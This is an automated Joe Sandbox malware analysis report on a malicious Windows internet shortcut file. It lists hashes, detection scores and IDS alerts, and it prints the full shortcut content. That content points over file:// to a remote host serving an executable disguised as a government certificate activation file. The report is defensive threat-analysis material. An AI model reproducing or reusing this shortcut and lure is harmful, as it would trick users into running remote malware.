
Windows Analysis Report
3d#U0430.url

Overview

General Information

Sample name:3d#U0430.url
renamed because original name is a hash value
Original sample name: .url
Analysis ID:1561507
MD5:9aff477d681be77815b141cad037d7b6
SHA1:1da43753c3b48eb25180b04a2e7c6d64d9159be5
SHA256:8cf24fe1384ca8ea763081b78fd14995704bbd73a871ebe1c362053767aeec20
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Found malicious URL file
Suricata IDS alerts with low severity for network traffic

Classification

No configs have been found
No yara matches
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T16:13:33.349670+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 50017 | 20.42.65.84 | 443 | TCP


AV Detection

Source: 3d#U0430.url | ReversingLabs: Detection: 42%
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50017 -> 20.42.65.84:443

System Summary

Source: 3d#U0430.url | Initial sample:
  [InternetShortcut]
  URL=file://92.42.96.30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe
  IconIndex=1
  HotKey=0
  IDList=
  IconFile=C:\Windows\System32\SHELL32.dll
  [{009862A0-0000-0000-C000-000000005986}]
  Prop3=19,9
  [{000214A0-0000-0000-C000-000000000046}]
  Prop3=19,9
  [InternetShortcut.A]
  [InternetShortcut.W]
  URL=file://92.42.96.30/Activation/Certificate+AF8hFgBf-45052389+AF8-005553.exe
Source: classification engine | Classification label: mal52.winURL@0/0@0/0
Source: 3d#U0430.url | ReversingLabs: Detection: 42%
No Mitre Att&ck techniques found
Source | Detection | Scanner | Label | Link
3d#U0430.url | 42% | ReversingLabs | Shortcut.Exploit.CVE-2024-4351 |
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1561507
Start date and time:2024-11-23 16:07:46 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 22s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:3d#U0430.url
renamed because original name is a hash value
Original Sample Name: .url
Detection:MAL
Classification:mal52.winURL@0/0@0/0
Cookbook Comments:
  • Found application associated with file extension: .url
  • Stop behavior analysis, all processes terminated
  • No process behavior to analyse as no analysis process or sample was found
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
  • VT rate limit hit for: 3d#U0430.url
No simulations
No context
No created / dropped files found
File type:MS Windows 95 Internet shortcut text (URL=<file://92.42.96.30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe>), ASCII text, with CRLF line terminators
Entropy (8bit):5.300940822861295
TrID:
  • Windows URL shortcut (11001/1) 91.66%
  • Generic INI configuration (1001/1) 8.34%
File name:3d#U0430.url
File size:407 bytes
MD5:9aff477d681be77815b141cad037d7b6
SHA1:1da43753c3b48eb25180b04a2e7c6d64d9159be5
SHA256:8cf24fe1384ca8ea763081b78fd14995704bbd73a871ebe1c362053767aeec20
SHA512:0ac9cb5cf7e0f7aeae2129c7182dca232a9932328404a6a592ceb26296b7b60399d7e741509d839917afc2f1eab92bc02980fbc07a0dc47e9192079c91747cc7
SSDEEP:12:HRYFVmdg97y51EDYQ89nycXaVWfmJAVW4xhFYFeLpYddZVEI1oYn:HOFVmh5q0Q89nympfk34xhFYFa2rvoYn
TLSH:F1E02B18D59DD5D1C6132C4E5161F885EC0FB4C909F3D88C25D7D9CA1C62471CA4CFA2
File Content Preview:[InternetShortcut]..URL=file://92.42.96.30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe..IconIndex=1..HotKey=0..IDList=..IconFile=C:\Windows\System32\SHELL32.dll..[{009862A0-0000-0000-C000-000000005986}]..Prop3=19,9..[{000214A0-0000-0000-C000-
Icon Hash:6de5a7b7b3b3a185
No network behavior found
No statistics
No system behavior
No disassembly